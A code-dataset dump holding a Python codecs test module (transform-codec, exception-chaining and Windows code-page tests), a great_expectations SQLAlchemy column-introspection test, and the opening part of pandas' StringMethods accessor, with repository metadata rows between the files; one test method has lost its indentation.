                (i, size) = codecs.getdecoder(encoding)(o)
                self.assertEqual(size, len(o))
                self.assertEqual(i, binput)

    def test_read(self):
        """StreamReader.read() must work for bytes-producing codecs."""
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                sin = codecs.encode(b"\x80", encoding)
                reader = codecs.getreader(encoding)(io.BytesIO(sin))
                sout = reader.read()
                self.assertEqual(sout, b"\x80")

    def test_readline(self):
        """StreamReader.readline() must work for bytes-producing codecs."""
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                sin = codecs.encode(b"\x80", encoding)
                reader = codecs.getreader(encoding)(io.BytesIO(sin))
                sout = reader.readline()
                self.assertEqual(sout, b"\x80")

    def test_buffer_api_usage(self):
        """Transform codecs accept any object supporting the buffer API."""
        original = b"12345\x80"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                data = original
                view = memoryview(data)
                data = codecs.encode(data, encoding)
                view_encoded = codecs.encode(view, encoding)
                self.assertEqual(view_encoded, data)
                view = memoryview(data)
                data = codecs.decode(data, encoding)
                self.assertEqual(data, original)
                view_decoded = codecs.decode(view, encoding)
                self.assertEqual(view_decoded, data)

    def test_text_to_binary_blacklists_binary_transforms(self):
        """str.encode() must refuse bytes-to-bytes codecs with a clear error."""
        bad_input = "bad input type"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                # Raw strings: the parentheses are regex-escaped because
                # assertRaisesRegex treats the message as a pattern.
                fmt = (r"{!r} is not a text encoding; "
                       r"use codecs.encode\(\) to handle arbitrary codecs")
                msg = fmt.format(encoding)
                with self.assertRaisesRegex(LookupError, msg) as failure:
                    bad_input.encode(encoding)
                # The blacklist fires before any codec runs: no chained cause.
                self.assertIsNone(failure.exception.__cause__)

    def test_text_to_binary_blacklists_text_transforms(self):
        """str.encode() must also refuse str-to-str codecs such as rot_13."""
        msg = (r"^'rot_13' is not a text encoding; "
               r"use codecs.encode\(\) to handle arbitrary codecs")
        with self.assertRaisesRegex(LookupError, msg):
            "just an example message".encode("rot_13")

    def test_binary_to_text_blacklists_binary_transforms(self):
        """bytes/bytearray.decode() must refuse bytes-to-bytes codecs."""
        data = b"encode first to ensure we meet any format restrictions"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                encoded_data = codecs.encode(data, encoding)
                fmt = (r"{!r} is not a text encoding; "
                       r"use codecs.decode\(\) to handle arbitrary codecs")
                msg = fmt.format(encoding)
                with self.assertRaisesRegex(LookupError, msg):
                    encoded_data.decode(encoding)
                with self.assertRaisesRegex(LookupError, msg):
                    bytearray(encoded_data).decode(encoding)

    def test_binary_to_text_blacklists_text_transforms(self):
        """bytes/bytearray.decode() must refuse str-to-str codecs too."""
        for bad_input in (b"immutable", bytearray(b"mutable")):
            with self.subTest(bad_input=bad_input):
                msg = (r"^'rot_13' is not a text encoding; "
                       r"use codecs.decode\(\) to handle arbitrary codecs")
                with self.assertRaisesRegex(LookupError, msg) as failure:
                    bad_input.decode("rot_13")
                self.assertIsNone(failure.exception.__cause__)

    @yp_unittest.skipUnless(zlib, "Requires zlib support")
    def test_custom_zlib_error_is_wrapped(self):
        """Codec machinery wraps zlib errors, chaining the original cause."""
        msg = "^decoding with 'zlib_codec' codec failed"
        with self.assertRaisesRegex(Exception, msg) as failure:
            codecs.decode(b"hello", "zlib_codec")
        self.assertIsInstance(failure.exception.__cause__,
                              type(failure.exception))

    def test_custom_hex_error_is_wrapped(self):
        """Codec machinery wraps binascii errors from the hex codec."""
        msg = "^decoding with 'hex_codec' codec failed"
        with self.assertRaisesRegex(Exception, msg) as failure:
            codecs.decode(b"hello", "hex_codec")
        self.assertIsInstance(failure.exception.__cause__,
                              type(failure.exception))

    # Ensure codec aliases from http://bugs.python.org/issue7475 work
    def test_aliases(self):
        for codec_name, aliases in transform_aliases.items():
            expected_name = codecs.lookup(codec_name).name
            for alias in aliases:
                with self.subTest(alias=alias):
                    info = codecs.lookup(alias)
                    self.assertEqual(info.name, expected_name)

    def test_uu_invalid(self):
        # Missing "begin" line
        self.assertRaises(ValueError, codecs.decode, b"", "uu-codec")
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple search functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
    # Search function for codecs.register(); returns None for unknown names
    # so lookup falls through to the other registered search functions.
    return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
    # Issue #22166: Also need to clear the internal cache in CPython
    from _codecs import _forget_codec
except ImportError:
    def _forget_codec(codec_name):
        # No internal cache to clear on this implementation.
        pass
@yp_unittest.skip_str_codecs
class ExceptionChainingTest(yp_unittest.TestCase):
    def setUp(self):
        # Codec search functions cannot be unregistered, so instead give the
        # test codec a truly unique name per test instance; this avoids
        # issues with the codec cache when running these tests multiple
        # times (e.g. when hunting for refleaks).
        unique_id = repr(self) + str(id(self))
        self.codec_name = encodings.normalize_encoding(unique_id).lower()
        # The exception object (or type) to raise is stored on the instance
        # so each test can customize it; raise_obj() reads it at call time.
        self.obj_to_raise = RuntimeError
    def tearDown(self):
        # Drop the per-test codec and flush it from the interpreter's
        # internal codec cache (when that hook exists).
        _TEST_CODECS.pop(self.codec_name, None)
        try:
            _forget_codec(self.codec_name)
        except KeyError:
            pass
    def set_codec(self, encode, decode):
        # Install the given encode/decode callables under this test's
        # unique codec name so str.encode()/bytes.decode() can find them.
        codec_info = codecs.CodecInfo(encode, decode,
                                      name=self.codec_name)
        _TEST_CODECS[self.codec_name] = codec_info
    @contextlib.contextmanager
    def assertWrapped(self, operation, exc_type, msg):
        # Assert the block raises exc_type with the codec-wrapping message
        # format, with the original exception chained as __cause__.
        full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
                  operation, self.codec_name, exc_type.__name__, msg)
        with self.assertRaisesRegex(exc_type, full_msg) as caught:
            yield caught
        self.assertIsInstance(caught.exception.__cause__, exc_type)
        self.assertIsNotNone(caught.exception.__cause__.__traceback__)
    def raise_obj(self, *args, **kwds):
        # Used as both the encode and decode entry point of the test codec.
        raise self.obj_to_raise
    def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
        # Verify all four entry points (str.encode, codecs.encode,
        # bytes.decode, codecs.decode) wrap the raised exception.
        self.obj_to_raise = obj_to_raise
        self.set_codec(self.raise_obj, self.raise_obj)
        with self.assertWrapped("encoding", exc_type, msg):
            "str_input".encode(self.codec_name)
        with self.assertWrapped("encoding", exc_type, msg):
            codecs.encode("str_input", self.codec_name)
        with self.assertWrapped("decoding", exc_type, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertWrapped("decoding", exc_type, msg):
            codecs.decode(b"bytes input", self.codec_name)
    def test_raise_by_type(self):
        # Raising a bare exception type should be wrapped.
        self.check_wrapped(RuntimeError, "")
    def test_raise_by_value(self):
        # Raising an instance with a single str argument should be wrapped.
        msg = "This should be wrapped"
        self.check_wrapped(RuntimeError(msg), msg)
    def test_raise_grandchild_subclass_exact_size(self):
        # A slotted subclass (no instance __dict__) is still wrappable.
        msg = "This should be wrapped"
        class MyRuntimeError(RuntimeError):
            __slots__ = ()
        self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
    def test_raise_subclass_with_weakref_support(self):
        """A plain RuntimeError subclass (with __dict__) is still wrapped."""
        msg = "This should be wrapped"
        class MyRuntimeError(RuntimeError):
            pass
        self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
    def check_not_wrapped(self, obj_to_raise, msg):
        """Check that *obj_to_raise* escapes unwrapped from all four
        encode/decode entry points."""
        def raise_obj(*args, **kwds):
            raise obj_to_raise
        self.set_codec(raise_obj, raise_obj)
        with self.assertRaisesRegex(RuntimeError, msg):
            "str input".encode(self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            codecs.encode("str input", self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            codecs.decode(b"bytes input", self.codec_name)
    def test_init_override_is_not_wrapped(self):
        """A subclass overriding __init__ is not wrapped (its signature may differ)."""
        class CustomInit(RuntimeError):
            def __init__(self):
                pass
        self.check_not_wrapped(CustomInit, "")
    def test_new_override_is_not_wrapped(self):
        """A subclass overriding __new__ is not wrapped (its signature may differ)."""
        class CustomNew(RuntimeError):
            def __new__(cls):
                return super().__new__(cls)
        self.check_not_wrapped(CustomNew, "")
    def test_instance_attribute_is_not_wrapped(self):
        """An exception carrying extra instance state is not wrapped
        (re-creating it would lose the attribute)."""
        msg = "This should NOT be wrapped"
        exc = RuntimeError(msg)
        exc.attr = 1
        self.check_not_wrapped(exc, "^{}$".format(msg))
    def test_non_str_arg_is_not_wrapped(self):
        """A non-string args[0] cannot be safely augmented, so no wrapping."""
        self.check_not_wrapped(RuntimeError(1), "1")
    def test_multiple_args_is_not_wrapped(self):
        """More than one constructor argument disables wrapping."""
        msg_re = r"^\('a', 'b', 'c'\)$"
        self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
    def test_codec_lookup_failure_not_wrapped(self):
        """LookupError from a failed codec lookup is reported as-is.
        The codec is deliberately never registered for this test."""
        msg = "^unknown encoding: {}$".format(self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            "str input".encode(self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            codecs.encode("str input", self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            codecs.decode(b"bytes input", self.codec_name)
def test_unflagged_non_text_codec_handling(self):
# pre-emptively skipped by the text model related methods
# However, third party codecs won't be flagged, so we still make
def encode_to_str(*args, **kwds):
return "not bytes!", 0
def decode_to_bytes(*args, **kwds):
return b"not str!", 0
self.set_codec(encode_to_str, decode_to_bytes)
encoded = codecs.encode(None, self.codec_name)
self.assertEqual(encoded, "not bytes!")
decoded = codecs.decode(None, self.codec_name)
self.assertEqual(decoded, b"not str!")
fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
"use codecs.encode\(\) to encode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
"str_input".encode(self.codec_name)
fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
"use codecs.decode\(\) to decode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
b"bytes input".decode(self.codec_name)
@yp_unittest.skipUnless(sys.platform == 'win32',
                        'code pages are specific to Windows')
@yp_unittest.skip_str_codecs
class CodePageTest(yp_unittest.TestCase):
    """Tests for the Windows-only codecs.code_page_encode/decode APIs."""
    # Windows code page number for UTF-8.
    CP_UTF8 = 65001
    def test_invalid_code_page(self):
        """Negative code pages raise ValueError; unknown ones raise OSError."""
        self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
        self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
        self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
        self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
    def test_code_page_name(self):
        """Unicode error messages mention the code page's name."""
        self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
                               codecs.code_page_encode, 932, '\xff')
        self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
                               codecs.code_page_decode, 932, b'\x81\x00')
        self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
                               codecs.code_page_decode, self.CP_UTF8, b'\xff')
    def check_decode(self, cp, tests):
        """Run (raw, errors, expected) decode cases against code page *cp*;
        expected=None means a UnicodeDecodeError is required."""
        for raw, errors, expected in tests:
            if expected is not None:
                try:
                    decoded = codecs.code_page_decode(cp, raw, errors)
                except UnicodeDecodeError as err:
                    self.fail('Unable to decode %a from "cp%s" with '
                              'errors=%r: %s' % (raw, cp, errors, err))
                self.assertEqual(decoded[0], expected,
                                 '%a.decode("cp%s", %r)=%a != %a'
                                 % (raw, cp, errors, decoded[0], expected))
                # decoded[1] is the number of input bytes consumed.
                self.assertGreaterEqual(decoded[1], 0)
                self.assertLessEqual(decoded[1], len(raw))
            else:
                self.assertRaises(UnicodeDecodeError,
                                  codecs.code_page_decode, cp, raw, errors)
    def check_encode(self, cp, tests):
        """Run (text, errors, expected) encode cases against code page *cp*;
        expected=None means a UnicodeEncodeError is required."""
        for text, errors, expected in tests:
            if expected is not None:
                try:
                    encoded = codecs.code_page_encode(cp, text, errors)
                except UnicodeEncodeError as err:
                    self.fail('Unable to encode %a to "cp%s" with '
                              'errors=%r: %s' % (text, cp, errors, err))
                self.assertEqual(encoded[0], expected,
                                 '%a.encode("cp%s", %r)=%a != %a'
                                 % (text, cp, errors, encoded[0], expected))
                self.assertEqual(encoded[1], len(text))
            else:
                self.assertRaises(UnicodeEncodeError,
                                  codecs.code_page_encode, cp, text, errors)
    def test_cp932(self):
        """Encode/decode and error-handler behaviour for code page 932."""
        self.check_encode(932, (
            ('abc', 'strict', b'abc'),
            ('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
            ('\xff', 'strict', None),
            ('[\xff]', 'ignore', b'[]'),
            ('[\xff]', 'replace', b'[y]'),
            ('[\u20ac]', 'replace', b'[?]'),
            ('[\xff]', 'backslashreplace', b'[\\xff]'),
            ('[\xff]', 'xmlcharrefreplace', b'[ÿ]'),
        ))
        self.check_decode(932, (
            (b'abc', 'strict', 'abc'),
            (b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
            (b'[\xff]', 'strict', None),
            (b'[\xff]', 'ignore', '[]'),
            (b'[\xff]', 'replace', '[\ufffd]'),
            (b'[\xff]', 'surrogateescape', '[\udcff]'),
            (b'\x81\x00abc', 'strict', None),
            (b'\x81\x00abc', 'ignore', '\x00abc'),
            (b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
        ))
    def test_cp1252(self):
        """Encode/decode behaviour for code page 1252 (Western European)."""
        self.check_encode(1252, (
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict', b'\xe9\x80'),
            ('\xff', 'strict', b'\xff'),
            ('\u0141', 'strict', None),
            ('\u0141', 'ignore', b''),
            ('\u0141', 'replace', b'L'),
        ))
        self.check_decode(1252, (
            (b'abc', 'strict', 'abc'),
            (b'\xe9\x80', 'strict', '\xe9\u20ac'),
            (b'\xff', 'strict', '\xff'),
        ))
    def test_cp_utf7(self):
        """Encode/decode behaviour for code page 65000 (UTF-7)."""
        cp = 65000
        self.check_encode(cp, (
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict', b'+AOkgrA-'),
            ('\U0010ffff', 'strict', b'+2//f/w-'),
            ('\udc80', 'strict', b'+3IA-'),
            ('\ufffd', 'strict', b'+//0-'),
        ))
        self.check_decode(cp, (
            (b'abc', 'strict', 'abc'),
            (b'+AOkgrA-', 'strict', '\xe9\u20ac'),
            (b'+2//f/w-', 'strict', '\U0010ffff'),
            (b'+3IA-', 'strict', '\udc80'),
            (b'+//0-', 'strict', '\ufffd'),
            (b'[+/]', 'strict', '[]'),
            (b'[\xff]', 'strict', '[\xff]'),
        ))
    def test_multibyte_encoding(self):
        """Error handlers applied to truncated multibyte input sequences."""
        self.check_decode(932, (
            (b'\x84\xe9\x80', 'ignore', '\u9a3e'),
            (b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
        ))
        self.check_decode(self.CP_UTF8, (
            (b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
            (b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
        ))
        if VISTA_OR_LATER:
            self.check_encode(self.CP_UTF8, (
                ('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
                ('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
            ))
    def test_incremental(self):
        """With final=False, trailing partial sequences are left unconsumed."""
        decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
        self.assertEqual(decoded, ('', 0))
        decoded = codecs.code_page_decode(932,
                                          b'\xe9\x80\xe9', 'strict',
                                          False)
        self.assertEqual(decoded, ('\u9a3e', 2))
        decoded = codecs.code_page_decode(932,
                                          b'\xe9\x80\xe9\x80', 'strict',
                                          False)
        self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
        decoded = codecs.code_page_decode(932,
                                          b'abc', 'strict',
                                          False)
        self.assertEqual(decoded, ('abc', 3))
# Standard test-module entry point.
if __name__ == "__main__":
    yp_unittest.main()
| true | true |
f7fa316c85f6113e64369e1a1203eb7ce7ba6486 | 1,298 | py | Python | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 1 | 2021-04-11T20:54:23.000Z | 2021-04-11T20:54:23.000Z | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 53 | 2021-10-02T02:26:51.000Z | 2021-12-28T20:49:25.000Z | tests/expectations/metrics/test_table_column_types.py | OmriBromberg/great_expectations | 60eb81ebfb08fef5d37d55c316dc962928beb165 | [
"Apache-2.0"
] | 1 | 2022-03-03T16:47:32.000Z | 2022-03-03T16:47:32.000Z | from great_expectations.data_context.util import file_relative_path
from great_expectations.execution_engine import SqlAlchemyExecutionEngine
from great_expectations.execution_engine.sqlalchemy_batch_data import (
SqlAlchemyBatchData,
)
from great_expectations.expectations.metrics.import_manager import reflection
from great_expectations.util import get_sqlalchemy_inspector
def test_table_column_introspection(sa):
    """Smoke test: a SqlAlchemyBatchData built over a SQLite table exposes the
    expected selectable name/schema, and SQLAlchemy introspection returns the
    table's columns in order.

    ``sa`` is presumably the sqlalchemy module injected as a fixture — confirm
    against the test suite's conftest.
    """
    db_file = file_relative_path(
        __file__,
        "../../test_sets/test_cases_for_sql_data_connector.db",
    )
    eng = sa.create_engine(f"sqlite:///{db_file}")
    engine = SqlAlchemyExecutionEngine(engine=eng)
    batch_data = SqlAlchemyBatchData(
        execution_engine=engine, table_name="table_partitioned_by_date_column__A"
    )
    engine.load_batch_data("__", batch_data)
    assert isinstance(batch_data.selectable, sa.Table)
    assert batch_data.selectable.name == "table_partitioned_by_date_column__A"
    assert batch_data.selectable.schema is None
    insp = get_sqlalchemy_inspector(eng)
    columns = insp.get_columns(
        batch_data.selectable.name, schema=batch_data.selectable.schema
    )
    # Column order matters: the index column first, then the data columns.
    assert [x["name"] for x in columns] == [
        "index",
        "id",
        "date",
        "event_type",
        "favorite_color",
    ]
| 36.055556 | 81 | 0.747304 | from great_expectations.data_context.util import file_relative_path
from great_expectations.execution_engine import SqlAlchemyExecutionEngine
from great_expectations.execution_engine.sqlalchemy_batch_data import (
SqlAlchemyBatchData,
)
from great_expectations.expectations.metrics.import_manager import reflection
from great_expectations.util import get_sqlalchemy_inspector
def test_table_column_introspection(sa):
db_file = file_relative_path(
__file__,
"../../test_sets/test_cases_for_sql_data_connector.db",
)
eng = sa.create_engine(f"sqlite:///{db_file}")
engine = SqlAlchemyExecutionEngine(engine=eng)
batch_data = SqlAlchemyBatchData(
execution_engine=engine, table_name="table_partitioned_by_date_column__A"
)
engine.load_batch_data("__", batch_data)
assert isinstance(batch_data.selectable, sa.Table)
assert batch_data.selectable.name == "table_partitioned_by_date_column__A"
assert batch_data.selectable.schema is None
insp = get_sqlalchemy_inspector(eng)
columns = insp.get_columns(
batch_data.selectable.name, schema=batch_data.selectable.schema
)
assert [x["name"] for x in columns] == [
"index",
"id",
"date",
"event_type",
"favorite_color",
]
| true | true |
f7fa32076ec862689d2256ecc628e8edb2e78a76 | 102,458 | py | Python | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/strings/accessor.py | shalarewicz/pandas | 070341cf4958652343f798c74c04a8c15de2fd04 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | import codecs
from functools import wraps
import re
from typing import (
Dict,
List,
Optional,
)
import warnings
import numpy as np
import pandas._libs.lib as lib
from pandas.util._decorators import Appender
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCMultiIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import isna
from pandas.core.base import NoNewAttributesMixin
# Registry of docstring templates shared across the string accessor methods
# (filled in below and interpolated via @Appender).
_shared_docs: Dict[str, str] = {}
# Encodings that CPython special-cases (per the names; see usage elsewhere in
# this module) — decoding additionally covers the UTF-16/UTF-32 family below.
_cpython_optimized_encoders = (
    "utf-8",
    "utf8",
    "latin-1",
    "latin1",
    "iso-8859-1",
    "mbcs",
    "ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
def forbid_nonstring_types(forbidden, name=None):
    """
    Decorator factory that forbids specific inferred dtypes for a
    StringMethods method.

    ``StringMethods.__init__`` accepts the *union* of dtypes usable by any of
    its methods (after skipping NaNs): ``['string', 'empty', 'bytes', 'mixed',
    'mixed-integer']``. Individual methods accept only a subset of that union,
    so each one declares — via this decorator — which of the non-default types
    (``'bytes'``, ``'mixed'``, ``'mixed-integer'``) it rejects. The default
    string types ``['string', 'empty']`` are always allowed.

    Parameters
    ----------
    forbidden : list-of-str or None
        Inferred dtypes to reject; ``None`` means nothing is forbidden.
    name : str, default None
        Method name used in the error message (and as the wrapper's
        ``__name__``). When None, the wrapped function's own name is used.
        Specifying it explicitly is necessary when stacking further wrappers.

    Returns
    -------
    func : wrapper
        The decorated method, which raises TypeError when called on data whose
        inferred dtype is in *forbidden*.

    Raises
    ------
    TypeError
        If the inferred dtype of the underlying data is in `forbidden`.
    """
    # ``None`` is equivalent to "nothing is forbidden".
    if forbidden is None:
        forbidden = []
    permitted = {"string", "empty", "bytes", "mixed", "mixed-integer"}.difference(
        forbidden
    )

    def decorate(func):
        label = name if name is not None else func.__name__

        @wraps(func)
        def checked(self, *args, **kwargs):
            inferred = self._inferred_dtype
            if inferred in permitted:
                return func(self, *args, **kwargs)
            raise TypeError(
                f"Cannot use .str.{label} with values of "
                f"inferred dtype '{inferred}'."
            )

        checked.__name__ = label
        return checked

    return decorate
def _map_and_wrap(name, docstring):
    # Factory for simple no-argument accessor methods: forwards to the backing
    # array's ``_str_<name>`` implementation and wraps the raw result.
    # ``bytes`` data is always rejected for these methods.
    @forbid_nonstring_types(["bytes"], name=name)
    def wrapper(self):
        result = getattr(self._data.array, f"_str_{name}")()
        return self._wrap_result(result)
    wrapper.__doc__ = docstring
    return wrapper
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index.
NAs stay NA unless handled otherwise by a particular method.
Patterned after Python's string methods, with some inspiration from
R's stringr package.
Examples
--------
>>> s = pd.Series(["A_Str_Series"])
>>> s
0 A_Str_Series
dtype: object
>>> s.str.split("_")
0 [A, Str, Series]
dtype: object
>>> s.str.replace("_", "")
0 AStrSeries
dtype: object
"""
# Note: see the docstring in pandas.core.strings.__init__
# for an explanation of the implementation.
# TODO: Dispatch all the methods
# Currently the following are not dispatched to the array
# * cat
# * extract
# * extractall
    def __init__(self, data):
        """Initialize the accessor for a Series/Index ``data``; raises
        AttributeError (via _validate) for non-string-like data."""
        # Local imports — presumably to avoid circular imports at module load;
        # confirm against the module layout.
        from pandas.core.arrays.string_ import StringDtype
        from pandas.core.arrays.string_arrow import ArrowStringDtype
        self._inferred_dtype = self._validate(data)
        self._is_categorical = is_categorical_dtype(data.dtype)
        self._is_string = isinstance(data.dtype, (StringDtype, ArrowStringDtype))
        self._data = data
        self._index = self._name = None
        if isinstance(data, ABCSeries):
            self._index = data.index
            self._name = data.name
        # ._values.categories works for both Series/Index
        self._parent = data._values.categories if self._is_categorical else data
        # save orig to blow up categoricals to the right type
        self._orig = data
        # prevent accidental attribute creation after construction
        self._freeze()
    @staticmethod
    def _validate(data):
        """
        Auxiliary function for StringMethods, infers and checks dtype of data.
        This is a "first line of defence" at the creation of the StringMethods-
        object, and just checks that the dtype is in the
        *union* of the allowed types over all string methods below; this
        restriction is then refined on a per-method basis using the decorator
        @forbid_nonstring_types (more info in the corresponding docstring).
        This really should exclude all series/index with any non-string values,
        but that isn't practical for performance reasons until we have a str
        dtype (GH 9343 / 13877)
        Parameters
        ----------
        data : The content of the Series
        Returns
        -------
        dtype : inferred dtype of data
        """
        if isinstance(data, ABCMultiIndex):
            raise AttributeError(
                "Can only use .str accessor with Index, not MultiIndex"
            )
        # see _libs/lib.pyx for list of inferred types
        allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
        values = getattr(data, "values", data) # Series / Index
        values = getattr(values, "categories", values) # categorical / normal
        # skipna=True: missing values don't disqualify an otherwise-string column
        inferred_dtype = lib.infer_dtype(values, skipna=True)
        if inferred_dtype not in allowed_types:
            raise AttributeError("Can only use .str accessor with string values!")
        return inferred_dtype
    def __getitem__(self, key):
        # Vectorized element-wise indexing/slicing of each string.
        result = self._data.array._str_getitem(key)
        return self._wrap_result(result)
    def __iter__(self):
        """Iterate over the i-th character of every string (deprecated)."""
        warnings.warn(
            "Columnar iteration over characters will be deprecated in future releases.",
            FutureWarning,
            stacklevel=2,
        )
        i = 0
        g = self.get(i)
        # Yield successive character columns until all strings are exhausted
        # (i.e. the column is entirely NA).
        while g.notna().any():
            yield g
            i += 1
            g = self.get(i)
    def _wrap_result(
        self,
        result,
        name=None,
        expand=None,
        fill_value=np.nan,
        returns_string=True,
    ):
        """Wrap a raw string-method result back into a Series/Index/DataFrame,
        preserving the caller's index/name and (when appropriate) dtype.

        NOTE(review): ``fill_value`` is accepted but unused in this body —
        presumably kept for signature compatibility; confirm before removing.
        """
        from pandas import (
            Index,
            MultiIndex,
        )
        if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
            # scalar or otherwise non-array result: pass through unwrapped
            if isinstance(result, ABCDataFrame):
                result = result.__finalize__(self._orig, name="str")
            return result
        assert result.ndim < 3
        # We can be wrapping a string / object / categorical result, in which
        # case we'll want to return the same dtype as the input.
        # Or we can be wrapping a numeric output, in which case we don't want
        # to return a StringArray.
        # Ideally the array method returns the right array type.
        if expand is None:
            # infer from ndim if expand is not specified
            expand = result.ndim != 1
        elif expand is True and not isinstance(self._orig, ABCIndex):
            # required when expand=True is explicitly specified
            # not needed when inferred
            def cons_row(x):
                if is_list_like(x):
                    return x
                else:
                    return [x]
            result = [cons_row(x) for x in result]
            if result:
                # propagate nan values to match longest sequence (GH 18450)
                max_len = max(len(x) for x in result)
                result = [
                    x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
                ]
        if not isinstance(expand, bool):
            raise ValueError("expand must be True or False")
        if expand is False:
            # if expand is False, result should have the same name
            # as the original otherwise specified
            if name is None:
                name = getattr(result, "name", None)
            if name is None:
                # do not use logical or, _orig may be a DataFrame
                # which has "name" column
                name = self._orig.name
        # Wait until we are sure result is a Series or Index before
        # checking attributes (GH 12180)
        if isinstance(self._orig, ABCIndex):
            # if result is a boolean np.array, return the np.array
            # instead of wrapping it into a boolean Index (GH 8875)
            if is_bool_dtype(result):
                return result
            if expand:
                result = list(result)
                out = MultiIndex.from_tuples(result, names=name)
                if out.nlevels == 1:
                    # We had all tuples of length-one, which are
                    # better represented as a regular Index.
                    out = out.get_level_values(0)
                return out
            else:
                return Index(result, name=name)
        else:
            index = self._orig.index
            # This is a mess.
            dtype: Optional[str]
            if self._is_string and returns_string:
                dtype = self._orig.dtype
            else:
                dtype = None
            if expand:
                cons = self._orig._constructor_expanddim
                result = cons(result, columns=name, index=index, dtype=dtype)
            else:
                # Must be a Series
                cons = self._orig._constructor
                result = cons(result, name=name, index=index)
            result = result.__finalize__(self._orig, method="str")
            if name is not None and result.ndim == 1:
                # __finalize__ might copy over the original name, but we may
                # want the new name (e.g. str.extract).
                result.name = name
            return result
    def _get_series_list(self, others):
        """
        Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
        into a list of Series (elements without an index must match the length
        of the calling Series/Index).
        Parameters
        ----------
        others : Series, DataFrame, np.ndarray, list-like or list-like of
            Objects that are either Series, Index or np.ndarray (1-dim).
        Returns
        -------
        list of Series
            Others transformed into list of Series.
        Raises
        ------
        TypeError
            If ``others`` (or one of its elements) is of an unsupported type.
        """
        from pandas import (
            DataFrame,
            Series,
        )
        # self._orig is either Series or Index
        idx = self._orig if isinstance(self._orig, ABCIndex) else self._orig.index
        # Generally speaking, all objects without an index inherit the index
        # `idx` of the calling Series/Index - i.e. must have matching length.
        # Objects with an index (i.e. Series/Index/DataFrame) keep their own.
        if isinstance(others, ABCSeries):
            return [others]
        elif isinstance(others, ABCIndex):
            return [Series(others._values, index=idx)]
        elif isinstance(others, ABCDataFrame):
            return [others[x] for x in others]
        elif isinstance(others, np.ndarray) and others.ndim == 2:
            # 2-D array: treat each column as one Series
